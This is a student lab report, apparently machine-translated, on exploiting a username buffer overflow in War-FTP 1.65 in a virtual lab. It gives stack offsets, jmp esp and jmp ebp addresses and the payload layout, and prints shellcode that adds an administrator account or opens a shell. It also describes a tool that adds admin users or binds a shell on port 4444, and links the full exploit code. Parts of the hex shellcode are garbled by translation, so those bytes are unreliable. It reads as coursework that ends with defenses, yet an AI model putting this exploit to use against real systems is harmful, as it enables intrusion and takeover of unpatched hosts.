1. Objective 1.1 understand the principle of Buffer Overflow
A buffer is a continuous area allocated in the memory during the running of the program. It is used to store arrays of characters.
. Overflow means that the filled data exceeds the original buffer boundary and illegally occupies another memory area. Buffer overflow occurs, that is, the original process changes due to the out-of-bounds filling of data. attackers can use this vulnerability to specially construct the filling data, so that the program can execute special code and ultimately obtain control.
1.2 master common Buffer Overflow Methods The purpose of a buffer overflow attack is to gain control over the program. Therefore, the attacker must achieve the following two goals: arrange appropriate code in the address space of the program; through appropriate initialization registers and memory, let the program jump to the address space scheduled by the intruders to execute.
These two targets are used to classify buffer overflow attacks. Buffer overflow attacks are divided into two methods: Code arrangement and control program execution process. Appropriate code methods are arranged in the address space of the program; the method for transferring the control program to the attack code.
1.3 understand the dangers of buffer overflow are destructive and concealed: destructive is reflected in the ease of stopping service programs, the server crashes or even deletes the data on the server or can execute and run the attack code. Concealment is reflected in the fact that software vulnerabilities are hard to avoid, the execution of the shellcode For buffering attacks is hard to detect, and the randomness and unpredictability of attacks.
1.4 master the methods to prevent and avoid buffer overflow attacks by making the buffer zone unexecutable through the operating system, so as to prevent attackers from embedding attack code and forcibly write the correct code; the boundary check of the compiler is used to implement buffer protection. The indirect method is to perform integrity check before the program pointer fails.
II. content 2.1 Analysis war-ftp v1.65 user name-based buffer overflow vulnerability practice courseware has pointed out: sending a username that exceeds 480 bytes to the server can trigger the vulnerability (that is, using the command USER longString \ r \ n). After overflow, the content in ESP contains part of longString. Verification and analysis are required.
2.2 analyze the stack structure of war-ftp v1.65, that is, the exact location of EIP, ESP, and ebp in the analysis stack.
2.3 construct exploit for war-ftp v1.65 Based on the above analysis results, refer to the example of practical courseware, obtain shellcode from the Internet (mainly metasploit.com), and construct exploit.
Iii. Environment 3.1 Debugging tool CDB (install Debugging Tools for Windows), this practice is enough to use CDB.
OllyDBG is a powerful 32-bit assembly-analysis debugger with a visual interface.
3.2 The C language is used for programming. shellcode can only be found in C, perl, ruby, javascript, and raw. I am only familiar with C.
3.3 The network environment uses the Virtual Machine Vmware6.5. The physical host and the built-in windows XP (192.168.85.3), windows server 2000 (192.168.85.6), and windows server 2003 (192.168.85.5) are in the network segment 192.168.85.0/24.
3.4 other Shellcode generation tools: http://www.metasploit.com: 55555/PAYLOADS
Stack pointer locating tool: ActivePerl, which provides a perl runtime environment. After metasploit is installed, PatternCreate under frameworklib. pl can be used to construct a non-repeated string; patternOffset in framework/sdk. pl is used to calculate the offset of a character segment in the string generated by the former.
Iv. Design (detailed process) 4.1 verify that the user name-based buffer overflow vulnerability of War-ftp v1.65 runs war-ftp 1.65 in Windows XP of the virtual host, allowing anonymous login;
Log on to the physical host using cuteftp, and add "AAA…" as the username ...", When the username length exceeds 480, war-ftp 1.65 encounters an exception or even crashes and exits. Use cdb (480 A), OllyDBG (481 A), and cdb (486 A) for debugging as follows:
Figure 4-1: The user name is 480
Figure 4-2: The user name is 481
Figure 4-3: The user name is 486
Figure 4-4: The user name is 500
In Figure 4-3, EIP = 63202041,41 is the ASCII code of A. Combined with Figure 4-4, this vaguely indicates that the EIP offset may be 485, which will be verified in the next section.
The preceding figure shows that War-ftp 1.65 has a vulnerability:
"Sending a 480-byte USER name to the server can trigger the vulnerability (that is, using the command USER longString \ r \ n). After overflow, the content in ESP contains part of longString ."
4.2 analyze the stack structure of War-ftp 1.65. Because the address in the stack Ret is assigned to an EIP, the CPU continues to execute the command pointed to by the EIP, that is, the content of the EIP Register indicates the next instruction address to be executed, so you need to locate the precise position of RET. In order to put shellcode into the ESP or EBP to which the expected EIP points, it is also necessary to locate the exact location of ESP and EBP. CDB, PatternCreate. pl, and PatternOffset. pl are used here.
First, use PatternCreate. pl to generate 1000 non-repeated characters;
Use cdb to suspend war-ftp 1.65, and then use one thousand characters as the FTP login username to connect to war-ftp 1.65;
Read the EIP value, ESP, EBP content:
Figure 4-5: EIP value, ESP, EBP content
Use PatternOffset. pl to calculate the offset of RET, ESP, and EBP:
Figure 4-6: RET, ESP, and EBP offset
The results show that EIP points to the 485th position (counting starts from 0), ESP points to the 493rd position, and EBP points to the 581st position. The stack structure of war-ftp 1.65 is as follows:
Figure 4-7: stack structure of war-ftp v1.65
4.3 obtain shellcode because it is not familiar with the assembly language and does not reach the realm of writing shellcode manually. Therefore, the shellcode used in this practice is from the Internet. The following are two examples:
// Shellcode, add the administrator user with the username zane and password enaz: net user zane enaz/add/* win32_adduser-PASS = enaz EXITFUNC = process USER = zane Size = 476 Encoder = Alpha2 http://metasploit.com */Unsigned char scode0 [] = "\ xeb \ x03 \ x59 \ xeb \ x05 \ xe8 \ xf8 \ xff \ x49 \ x49 \ x49 \ x49 \ x49 \ x49 \ x49 \ x49 "" \ x49 \ x49 \ x49 \ x49 \ x49 \ x49 \ x49 \ x49 \ x37 \ x49 \ x49 \ x49 \ x51 \ x5a \ x6a \ x4a "" \ x58 \ x30 \ x42 \ x30 \ x50 \ x41 \ x6b \ x41 \ x41 \ x5a \ x42 \ x32 \ x41 \ x42 \ x32 \ x42 "" \ x41 \ x41 \ x30 \ x42 \ x41 \ x58 \ x50 \ x38 \ x41 \ x42 \ x75 \ x7a \ x49 \ x79 \ x6c \ x69 "" \ x78 \ x51 \ x54 \ x57 \ cross 7 \ x43 \ x30 \ x63 \ x30 \ x4c \ x4b \ x67 \ x35 \ x45 \ x6c \ x6e "" \ x6b \ x71 \ x6c \ x66 \ x65 \ x43 \ x48 \ x55 \ x51 \ x5a \ x4f \ x4e \ x6b \ x4f \ x42 "\ x38 \ x4c \ x4b \ x43 \ x6f \ x51 \ x30 \ x56 \ x61 \ x78 \ x6b \ x30 \ x49 \ x4c \ x4b \ x76 "\ x54 \ x4c \ x4b \ x65 \ x51 \ x7a \ x4e \ x66 \ x51 \ x6b \ x5a \ x39 \ x6e \ x4c \ x4d" "\ x54 \ x4f \ x30 \ x73 \ x44 \ x56 \ x67 \ x68 \ x41 \ x5a \ x6a \ x66 \ x6d \ x44 \ x41 \ x6a" "\ x62 \ x58 \ x6b \ x48 \ x74 \ x65 \ x6b \ x72 \ x74 \ x31 \ x34 \ x77 \ x74 \ x74 \ x35 \ x79 "" \ x75 \ x6c \ x4b \ x73 \ x6f \ x67 \ x54 \ x64 \ x41 \ x7a \ x4b \ x62 \ x46 \ x6e \ x6b \ x64 "" \ x4c \ x30 \ x4b \ x6e \ x6b \ x33 \ x6f \ x75 \ x4c \ x37 \ x71 \ x48 \ x6b \ x6e \ x6b \ x57 "" \ x6c \ x4c \ x4b \ x77 \ x71 \ x58 \ x6b \ x4c \ x49 \ x61 \ x4c \ x56 \ x44 \ x47 \ x74 \ x69 "\ x53 \ cross \ x31 \ x4b \ cross 7 \ x45 \ x34 \ x4c \ x4b \ x31 \ x50 \ x64 \ cross 7 \ x6f \ x75 \ x49 "\ x50 \ x52 \ x58 \ x36 \ x6c \ x4c \ x4b \ x43 \ cross 7 \ x64 \ x4c \ x4e \ x6b \ x74 \ x30 \ x45" "\ x4c \ x4c \ x6d \ x4e \ x6b \ x63 \ x58 \ x33 \ x38 \ x6a \ x4b \ x47 \ x79 \ x4c \ x4b \ x4d "" \ x50 \ x68 \ x30 \ x37 \ Xi 7 \ x73 \ x30 \ x53 \ x30 \ x6e \ x6b \ x35 \ x38 \ x55 \ x6c \ x53 "\ x6f \ x47 \ x41 \ x6a \ x56 \ x73 \ x50 \ x52 \ x76 \ x4b \ x39 \ x7a \ x58 \ x4f \ x73 \ x6b "" \ cross 7 \ x63 \ x4b \ x76 \ x30 \ x42 \ x48 \ x31 \ x6e \ x78 \ x58 \ x78 \ x62 \ x62 \ x53 \ x62 "\ x48 \ x7a \ x38 \ x4b \ x4e \ x4f \ x7a \ x66 \ x6e \ x30 \ x57 \ x69 \ x6f \ x38 \ x67 \ x61 "\ x73 \ x50 \ x6d \ x55 \ x34 \ x66 \ x4e \ x33 \ x55 \ x73 \ x48 \ x35 \ x35 \ x61 \ x30 \ x54 & quot; \ x6f \ x45 \ x33 \ x31 \ x30 \ x50 \ x6e \ x72 \ x45 \ x50 \ x74 \ x65 \ cross 7 \ x30 \ x75 \ x41 & quot; \ x63 \ cross-site Scripting (x65) \ x73 \ x42 \ x37 \ x50 \ x51 \ x6a \ x62 \ x41 \ x62 \ x4e \ x72 \ x45 \ x71 "" \ x30 \ x71 \ x75 \ cross \ x6e \ x50 \ x61 \ x72 \ x5a \ x37 \ x50 \ x46 \ x4f \ x43 \ x71 \ x71 "" \ x54 \ x43 \ x74 \ x41 \ x30 \ x36 \ x46 \ x51 \ x36 \ x55 \ Client \ x6e \ x43 \ x55 \ Client "" \ x74 \ x55 \ Client \ x30 \ x6c \ x72 \ x4f \ x32 \ x43 \ x35 \ x31 \ x50 \ x6c \ x67 \ x64 "\ x32 \ x72 \ x4f \ x54 \ x35 \ x42 \ x50 \ x35 \ cross 7 \ x32 \ x61 \ x71 \ x74 \ x42 \ x4d \ x62 "\ x49 \ x30 \ x6e \ x55 \ x39 \ x33 \ x43 \ x73 \ x44 \ x71 \ x62 \ x51 \ x71 \ x72 \ x54 \ x50 ″ "\ x6f \ x54 \ x32 \ x31 \ x63 \ x45 \ cross \ x71 \ x6a \ x42 \ x41 \ x62 \ x4e \ x41 \ x75 \ x55" "\ cross \ x46 \ x4f \ x30 \ x41 \ x30 \ x44 \ x30 \ x44 \ x43 \ x30 \ x4a "; // when attacking the local host, open the CMD interface/* from "buffer overflow is so simple-School-hacker base" using char scode2 [] = "\ x55 \ x8B \ xEC \ x33 \ xC0 \ x50 \ x50 \ x50 \ xC6 \ x45 \ xF4 \ x4D \ xC6 \ x45 \ xF5 \ x53 "" \ xC6 \ x45 \ xF6 \ x56 \ xC6 \ x45 \ xF7 \ x43 \ xC6 \ x45 \ xF8 \ x52 \ xC6 \ x45 \ xF9 \ x54 \ xC6 \ x45 \ xFA \ x2E \ xC6 "" \ x45 \ xFB \ x44 \ xC6 \ x45 \ xFC \ x4C \ xC6 \ x45 \ xFD \ x4C \ xBA "\ x77 \ x1d \ x80 \ x7c" \ x52 \ x8D \ x45 \ xF4 \ x50 \ xFF \ x55 \ xF0 "\ x55 \ x8B \ xEC \ x83 \ xEC \ x2C \ xB8 \ x63 \ x6F \ x6D \ x6D \ x89 \ x45 \ xF4 \ xB8 \ x61 \ x6E \ x64 \ x2E "" \ x89 \ x45 \ xF8 \ xB8 \ x63 \ x6F \ x6D \ x22 \ x89 \ x45 \ xFC \ x33 \ xD2 \ x88 \ x55 \ xFF \ x8D \ x45 \ xF4 "" \ x50 \ xB8 "" \ xc7 \ x93 \ xbf \ x77 "" \ xFF \ xD0 "" \ x83 \ xC4 \ x12 \ x5D ";
In addition
// Bind a shell to port 4444, which can be remotely logged on via telnet
/* Win32_bind-EXITFUNC = process LPORT = 4444 Size = 696 Encoder = Alpha2 http://metasploit.com */
4.4 constructing exploit one of the key points here is to look for the jump address that makes up the injection vector:
If you select ESP as the jump register, you need the jmp esp command address and use the Code proposed by failwest in "software vulnerability analysis entry _ 6_primary shellcode _ locating the buffer, find the jmp esp: 0x77d7c5fb, jmp esp: 0x7c834d7b, in addition, the common jmp esp: 0x7ffa4512 in WIN 2 K/XP/2003 can be used. If EBP is selected as the jump register, the jmp ebp instruction address is required, this can use the common jmp ebp: 0x7ffa4967 in WIN 2 K/XP/2003.
The second important point is to construct the attack code:
Shellcode may be very long, so the RNS mode is used (to construct a large array, the first part of the array is filled with R, that is, the return address. Here, the number of filled R must be able to overwrite ret, the value of R must point to a large number of nops, so that after a certain nops idling, shellcode will be executed .)
Figure 4-8: Use the exploit of JMP ESP
Figure 4-8's exploit constructs an array starting with a space followed by the command USER, followed by 485 NOP idling commands, the next four bytes are filled with jmp esp addresses such as "\ x12 \ x45 \ xfa \ x7f" (this is because the x86 system uses the little-endian mode ), the next 4 bytes continue to be filled with NOP, and then the shellcode is copied from 498th bytes, and \ r \ n is used to indicate that the ftp user command has ended. During the attack, buffer overflow occurs. The CPU jumps to the ESP starting from 493rd bytes of the stack to execute shellcode according to the EIP address.
Figure 4-9: using the exploit of JMP EBP
Figure 4-9's exploit constructs an array starting with a space followed by the command USER, followed by 485 NOP idling commands, the next four bytes are filled with jmp esp addresses such as "\ x12 \ x45 \ xfa \ x7f" (this is because the x86 system uses the little-endian mode ), then, 92 bytes continue to be filled with NOP, and shellcode is copied from 586th bytes. \ r \ n indicates that the ftp user command ends. During the attack, buffer overflow occurs. The CPU jumps to the EBP starting from 581st bytes of the stack based on the EIP address and executes shellcode.
4.5 programming implementation based on the USER's choice, construct the overflow string (that is, the USER command followed by shellcode after the construction:
USER exploitcode \ r \ n );
Use Socket to connect to the target host based on the data provided by the user;
Send an overflow string (send) to the target host );
Close the connection.
4.6 The program compiled for the program test (see the conclusion) carries out the corresponding attack based on the target IP address and attack number entered by the user. For detailed results, see the "practical conclusion" below ".
V. Conclusion running warftpattack in DOS can provide instructions for use and available attack types:
Figure 5-1: main program running interface
The correct command for using this program is:
Warftpattack Multiple attack types are provided. Among them, attacks 0 pass the test on Windows 2 K/XP/2003, while others pass only on XP.
5.1 remote host creation administrator user command warftpattack 192.168.85.6 0 attack windows 2000 Server in the virtual machine, the results are as follows:
Figure 5-2: remote host creation Administrator
The left half is the prompt of running warftpattack on the physical HOST: use windows 2 k/xp/2003 universal jmp esp: 0x7ffa4512, and create a new password on the remote host as the enaz administrator user zane, EXITFUNC = process. The right half indicates that the zane user is created on the target host.
5.2 remote host open port 4444 use the command warftpattack 192.168.85.3 1 to attack windows XP in the virtual machine. The result is as follows:
Figure 5-3: attack a remote host and open port 4444
The upper-left part of is the prompt of running warftpattack on the physical HOST: use the common jmp esp: 0x7ffa4512 of windows 2 k/xp/2003, bind a shell to port 4444, remote telnet logon is supported. in the upper-right corner, the attacker is using telnet to log on to the attacked host. In the lower part, the attacker is successfully logged on to the war-ftp installation directory of the attacked host.
5.3 attack local host Open shell and use the command warftpattack 192.168.85.3 2 to attack local host 127.0.0.1. The result is as follows:
Figure 5-4: attack the local host and open the shell
The upper half is the prompt for running warftpattack: Use jmp esp: 0x77d7c5fb of windowsXP user32.dll. The CMD interface is displayed when the local host 127.0.0.1 is attacked, and the lower half is the shell Interface popped up after the program is run, it indicates that the expected attack effect is achieved.
5.4 use the non-generic jmp esp command warftpattack 192.168.85.3 3 to attack windows XP in the virtual machine. The result is as follows:
Figure 5-5: Use a non-generic JMP ESP
The left half is the prompt of running warftpattack on the physical host: Use jmp esp: 0x7c834d7b of windowsXP kernel32.dll, and create a new password on the remote host as zane, EXITFUNC = thread, before and after attacks on host user accounts in the right half.
The command warftpattack 192.168.85.3 3 and the command warftpattack 192.168.85.3 2 use the core kernel32.dll of Windows XP and jmp esp address of user32.dll respectively.
5.5 use jmp ebp to use the command warftpattack 192.168.85.3 4 to attack windows XP in the virtual machine. The result is as follows:
Figure 5-6: Using JMP EBP
The left half is the prompt of running warftpattack on the physical HOST: use the common jmp ebp: 0x7ffa4967 of windows 2 k/xp/2003, and create a new password on the remote host as zane, the administrator of enaz, EXITFUNC = process, before and after the attack on the host user account in the right half.
5.6 conclusion the program compiled can attack war-ftp 1.65 running on Windows XP and execute the new administrator user (the attack No. 0 is also effective for Windows Server) or open a port or shell. Compared with practice routines, the jmp esp address in Windows XP core dll is used. The second characteristic is that EBP is used as the jump register, the third feature is the ability to open port 4444 on the target host or the shell of the local host.
6. practice 6.1 defense methods against buffer overflow from the perspective of code writing, strict boundary checks are required for buffer operations, which can be implemented by some tools such as the compiler, in this practice, war-ftp 1.65 should be used to check the boundary of the username array. In terms of running status, dynamic protection can be performed, mainly to check the array boundary and ensure the integrity of the returned pointer; from the perspective of the development language, you can use a type-secure programming language such as Java. In addition, you can also prevent the execution of attack code from the system perspective, such as non-execution Buffer technology. For the operating system, the DEP (Data Execution Prevention) introduced by Windows from XP SP2 continues to Windows Server 2003 and Windows Server 2008, the latter's Address Space Load Randomization makes buffer overflow attacks very difficult. In Windows 7, DEP is activated by default.
6.2 There are many problems encountered in practice. In the process of solving problems one by one, we experienced the joy of success and gradually deepened our understanding of related technologies.
1) War-ftp1.65 user name-based vulnerability cannot be presented
After returning from the practical instruction class, run the war-ftp 1.65 copied in Windows XP on the Virtual Machine and use the FTP command to connect to the war-ftp on the Virtual Machine under DOS of Windows XP on the physical host. According to the practice, when the USER is followed by more than 480 characters, the war-ftp program of the target host should crash, but even if I increase the number of characters to 1000, 2000, the war-ftp program is still safe and sound! This problem has plagued me for a few days. So mail ask, check whether the original version of the war-ftp1.65, increased the number of characters, but the vulnerability is not displayed. Later, the bitixy@yahoo.cn email reminded me that this may be Windows XP SP2 dos ftp command has a limit on the USER length, that is, when the transfer to the target host generated a cut! After testing, we found that when the USER length exceeds 78 characters, the system only intercepts the first 78 characters and sends them to the target host. After knowing the cause, I used CuteFTP to log on. When the username length exceeds 480 characters, the vulnerability is displayed. This problem is solved. This problem should be solved early if I have carefully analyzed the username displayed in the status bar of war-ftp.
2) When the string generated by using patterncreate. pl exceeds 1132, The EIP cannot be located.
When patterncreate. when pl generates 2000, 1200, and 1133 characters for attack, the read EIP, ESP, and EBP contents are not included in these generated characters. When a 1132 character is generated for attack, can locate EIP, ESP, and EBP. Why? We look forward to your analysis. But this prompt reminds me to pay attention to the length of the added shellcode. The length of the character array containing shellcode that does not include the "USER" string cannot exceed 1132; otherwise, the attack is invalid. The last practice proves that this guess is correct!
3) The Shellcode generated by Metasploit cannot be used.
Download the framework of Metasploit 3, select the WEB interface, and generate shellcode from payloads. The shellcode generated in the result cannot achieve the expected attack effect. Communicate with people and search for them online for a long time. The final useful information is: select the corresponding platform, such as the WIN32 platform, and select process, thread, for EXITFUNC, however, you cannot select seh for the exploit constructed in this practice. Why do you only find this in the reply to an email list:
"When EXITFUNC is set to" thread ", it uses ExitThread (), when it is" process ", it uses ExitProcess (), and when it is set to" seh ", it forces an exception (call 0 × 0 iirc ). ", and the full name of she is" Structured Exception Handler ".
So far, the specific reasons have not been clarified.
The more critical setting is the selection of Encoder, in order to increase the availability of the generated shellcode, if you choose to generate payloads from http://www.metasploit.com: 55555, it is necessary to select Alpha2 (Saumil Shah in Writing Metasploit Plugins, "Alpha2 generates resultant shellcode which is only alphanumeric") or PexAlphaNum. The specific causes need to be further studied.
4) how to find the jmp esp and jmp ebp addresses
The practice provides the common jmp esp address: 0x7ffa4512 for windows 2 K/XP/2003, and the common jmp ebp: 0x7ffa4967 address for windows 2 k/xp/2003. How can I find the JMP ESP address in the core dll of a specific version, which can be completed using the OllyUni plug-in of OllyDBG or related plug-ins in Metasploit Framework, you can also program to load the relevant * According to the jmp esp machine code 0xFFE4 *. dll.
5) can jmp esp be used only?
At first, we thought that only ESP could be used for the jump register. Later we found that EBP could also be used. As long as the corresponding address is specified in RET, EBP and the space afterwards are sufficient for storing shellcode.
6) suitable length of character array used for attack
I have never found the most important basis for this problem. When I solved 2nd million questions, I got a better answer, that is, the length of the character array containing shellcode that does not contain the "USER" string cannot exceed 1132. Because shellcode may be long, you can preset the length of the character array to be 1132 + 5 = 1137.
7) the remote host shell cannot be returned.
That is, after the attack command is run, the local host automatically obtains the shell of the remote host. This problem has not been solved. This may be related to the long shellcode that causes the length of the character array to exceed the total buffer size of war-ftp 1.65, or socket programming.
VII. literature reading [1] Aleph One. Smashing the Stack for Fun and Profit
Http://www.shmoo.com/phrack/49/p49-14
This paper describes in detail the stack structure in Linux and how to use stack-based buffer overflow. The contribution of Aleph One is to give a method for writing a shell Exploit, and assign the shellcode name to the code, which is still used till now. Compile a simple C program called by the system, extract the assembly code through the debugger, and modify the assembly code as needed. The Code provided by this tool can work correctly in x86/Linux, iSCSI/Solaris, and iSCSI/SunOS systems. Inspired by Aleph One's article, a large number of articles on the Internet show how to use buffer overflow and how to write a required Exploit. This is an actual buffer overflow attack.
[2] Sergio Alvarez. Intro to Win32 Exploits
In this paper, a stack buffer overflow vulnerability of 'war-ftpdvl.65' is selected. The article explains in detail how to locate the buffer length and find the 'jmp ESP 'address from vulnerability discovery, debugging, and exploitation, how to Write exploit. Python, fuzzer v1.0, OllyDBG, and OllyUni tools are used. This has a great inspiration for this practice, but it has little direct effect on this practice.
[3] failwest. Getting started with software vulnerability analysis
This is a series of getting started with software vulnerability analysis. I mainly read the initial shellcode Section and have a very detailed introduction to the software stack structure and buffer location, and provides the source code for obtaining jmp esp.
[4] C Cowan. Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade
This article proposes a detailed classification and analysis of buffer overflow vulnerabilities, attacks, and defense systems. In this paper, we propose several methods to prevent buffer overflow. arrays must undergo out-of-bounds checks, pointer integrity checks, compatibility and performance considerations, and programming in type security languages.
Complete code for this article: https://github.com/jiangzhw/stackoverflow